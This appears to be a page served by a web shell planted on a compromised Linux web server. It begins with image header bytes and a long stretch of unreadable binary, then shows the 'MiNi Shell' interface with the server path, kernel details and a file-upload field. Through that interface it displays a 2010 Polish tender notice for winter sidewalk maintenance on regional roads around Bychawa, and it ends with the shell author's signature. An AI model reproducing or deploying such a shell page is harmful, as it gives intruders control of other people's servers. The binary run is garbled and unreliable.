JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101013/330314-N-2010.html

<p class="kh_header"><b>Bychawa: Zimowe utrzymanie chodników dla pieszych w ciągu dróg wojewódzkich administrowanych przez RDW w Lublinie z/s w Bychawie w sezonie 2010/2011
Zadanie Nr I
- Nr 747 Chodel - Konopnica m. Bełżyce
Zadanie Nr II 
- Nr 747 Chodel - Konopnica, odc. Kozubszczyzna - Konopnica
- Nr 830  Lublin - Nałęczów, m. Kol. Dąbrowica
- Nr 833  Chodel - Kraśnik, m. Kraśnik ul. Urzędowska i  ul. Lubelska
Zadanie Nr III
 - Nr 834 Bełżyce - Stara Wieś, m. Bychawa</b><br>
<b>Numer ogłoszenia: 330314 - 2010; data zamieszczenia: 13.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Lublinie z/s w Bychawie , ul. Antoniego Budnego 5, 23-100 Bychawa, woj. lubelskie, tel. 081 5661393 w. 28, faks 081 5660256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie chodników dla pieszych w ciągu dróg wojewódzkich administrowanych przez RDW w Lublinie z/s w Bychawie w sezonie 2010/2011
Zadanie Nr I
- Nr 747 Chodel - Konopnica m. Bełżyce
Zadanie Nr II 
- Nr 747 Chodel - Konopnica, odc. Kozubszczyzna - Konopnica
- Nr 830  Lublin - Nałęczów, m. Kol. Dąbrowica
- Nr 833  Chodel - Kraśnik, m. Kraśnik ul. Urzędowska i  ul. Lubelska
Zadanie Nr III
 - Nr 834 Bełżyce - Stara Wieś, m. Bychawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje zimowe utrzymanie chodników dla pieszych w sezonie 2010/2011, w ciągu dróg wojewódzkich administrowanych przez RDW w Lublinie z/s w Bychawie:
Zadanie Nr I
- Nr 747 Chodel - Konopnica m. Bełżyce
Zadanie Nr II 
- Nr 747 Chodel - Konopnica, odc. Kozubszczyzna - Konopnica
- Nr 830  Lublin - Nałęczów, m. Kol. Dąbrowica
- Nr 833  Chodel - Kraśnik, m. Kraśnik ul. Urzędowska i  ul. Lubelska 
Zadanie Nr III
- Nr 834 Bełżyce - Stara Wieś, m. Bychawa	 
2. Usługi polegać będą na:
- odśnieżaniu i zwalczaniu śliskości nawierzchni chodników,
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji zamówienia wraz z ich obsługą,
- zapewnieniu przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług.
3. Materiały do zwalczania śliskości zabezpiecza  Wykonawca. 
4. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy na jego koszt.
5. Termin wykonania zamówienia ustala się:
- chodniki, dojścia do przejść dla pieszych, azyle - od dnia 01.12.2010 r. do dnia 30 kwietnia 2011 r. tj. przez 151 dni, 
- ścieżka rowerowa w lokalizacji zgodnej z przedmiarem -  od dnia 01.12.2010 r. do dnia 30 kwietnia 2011 r., w każdy piątek danego tygodnia tj. 22 + 8 razy w razie potrzeby na wezwanie Zamawiającego - razem 30 dni. 
6. Usługi w zakresie zimowego utrzymania chodników będą świadczone w zależności od występujących warunków atmosferycznych.
a) Wykonawca ma obowiązek przystąpienia do pracy nie później niż 2 godziny 
od wezwania do pracy przez Zamawiającego. 
b) W razie opóźnienia w rozpoczęciu usług przekraczającego 1 godzinę, Zamawiający ma prawo powierzyć wykonywanie usług innym osobom.
c) Okresowe powierzenie wykonywania usług objętych niniejszą umową innym wykonawcom nie zwalnia Wykonawcy z zapłaty kar umownych.
7. Zamawiający zastrzega sobie prawo do czasowego zawieszenia wykonywania usługi bez prawa wynagrodzenia w tym okresie.
8. Informacja o czasowym zawieszeniu usługi przekazywana będzie w formie faxu lub telefonicznie i potwierdzona pisemnie.
9. Przerwanie wykonywania usługi następuje w dniu następnym po dniu w którym Wykonawca otrzyma wiadomość o czasowym zawieszeniu.
10. Ustala się, że czasowe zawieszenie usługi winno nastąpić na okres nie krótszy niż 3 dni.
11. Wykonawca zobowiązany jest rozpocząć wykonywanie usługi po 2 godzinach od momentu powiadomienia go przez Zamawiającego o odwołaniu czasowego  zawieszenia.
12. W okresie ustabilizowanych warunków pogodowych Wykonawca zobowiązany jest  do zamiatania chodników w każdy piątek danego tygodnia.
13. Zimowe utrzymanie chodników należy wykonywać zgodnie ze Specyfikacją Techniczną.
14. Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych prac objętych umową. 
15. Zamawiający dopuszcza składanie ofert częściowych, Wykonawca może złożyć ofertę na jedno lub więcej zadań.  			  
16. Zgodnie z art. 30 ust. 4 ustawy Prawo zamówień publicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wskazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Prawo zamówień publicznych). Wielkość lub zakres zamówienia:120 345,70 zł netto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Ofertę przetargową (z ceną netto i z podatkiem VAT) wraz 
z załączonym kosztorysem ofertowym,
2. Wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcy - jeżeli Zamawiający zamierza powierzyć usługi podwykonawcom.
3.W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo Zamówień Publicznych,
4. W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie 
do ewidencji działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, pok. nr 1 lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres e-mail: rdw.lublin@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2010 godzina 11:45, miejsce: w siedzibie zamawiającego w pok. nr 5, otwarcie ofert - godz.12:00 w pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie - pocztą, za pomocą faksu nr (81) 566 02 56 lub drogą elektroniczną na adres e-mail: rdw.lublin@zdw.lublin.pl .
Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z wykonawcami: 
- w sprawach technicznych - P. Edward Rudzik, tel. (81) 566 13 93 w. 23, w. 25,
- w sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia 
i zawarciem umowy - P. Anna Kaczor, P. Ireneusz Król tel. (81) 566 13 93 w. 28, 
w godz. od 7:00  do 15:00.
Uwaga: 
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają się ubiegać o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem na numer (81) 566-02-56  lub pocztą elektroniczną na adres e-mail: rdw.lublin@zdw.lublin.pl, zawierającej podstawowe dane firmy ( nazwa, adres, numer telefonu i faksu ). Wykonawcy którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np. zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, odwołaniach dotyczących treści ogłoszenia i SIWZ, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie chodników dla pieszych w ciągu dróg wojewódzkich administrowanych przez RDW w Lublinie z/s w Bychawie w sezonie 2010/2011
Zadanie Nr I
- Nr 747 Chodel - Konopnica m. Bełżyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje zimowe utrzymanie chodników dla pieszych w sezonie 2010/2011, w ciągu dróg wojewódzkich administrowanych przez RDW w Lublinie z/s w Bychawie:
Zadanie Nr I
- Nr 747 Chodel - Konopnica m. Bełżyce 
2. Usługi polegać będą na:
-  odśnieżaniu i zwalczaniu śliskości nawierzchni chodników,
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji zamówienia wraz z ich obsługą,
- zapewnieniu przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług. Wielkość lub zakres zamówienia: 9 545,46 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie chodników dla pieszych w ciągu dróg wojewódzkich administrowanych przez RDW w Lublinie z/s w Bychawie w sezonie 2010/2011
Zadanie Nr II 
- Nr 747 Chodel - Konopnica, odc. Kozubszczyzna - Konopnica
- Nr 830  Lublin - Nałęczów, m. Kol. Dąbrowica
- Nr 833  Chodel - Kraśnik, m. Kraśnik ul. Urzędowska i  ul. Lubelska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje zimowe utrzymanie chodników dla pieszych w sezonie 2010/2011, w ciągu dróg wojewódzkich administrowanych przez RDW w Lublinie z/s w Bychawie:
Zadanie Nr II 
- Nr 747 Chodel - Konopnica, odc. Kozubszczyzna - Konopnica
- Nr 830  Lublin - Nałęczów, m. Kol. Dąbrowica
- Nr 833  Chodel - Kraśnik, m. Kraśnik ul. Urzędowska i  ul. Lubelska  
2. Usługi polegać będą na:
- odśnieżaniu i zwalczaniu śliskości nawierzchni chodników,
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji zamówienia wraz z ich obsługą,
- zapewnieniu przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług. Wielkość lielkość zakres zamówienia: 103 687,72 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zimowe utrzymanie chodników dla pieszych w ciągu dróg wojewódzkich administrowanych przez RDW w Lublinie z/s w Bychawie w sezonie 2010/2011
Zadanie Nr III
- Nr 834 Bełżyce - Stara Wieś, m. Bychawa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje zimowe utrzymanie chodników dla pieszych w sezonie 2010/2011, w ciągu dróg wojewódzkich administrowanych przez RDW w Lublinie z/s w Bychawie:
Zadanie Nr III
 - Nr 834 Bełżyce - Stara Wieś, m. Bychawa	 
2. Usługi polegać będą na:
-  odśnieżaniu i zwalczaniu śliskości nawierzchni chodników,
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji zamówienia wraz z ich obsługą,
- zapewnieniu przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług. Wielkość lub zakres zamówienia: 7 112,52 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com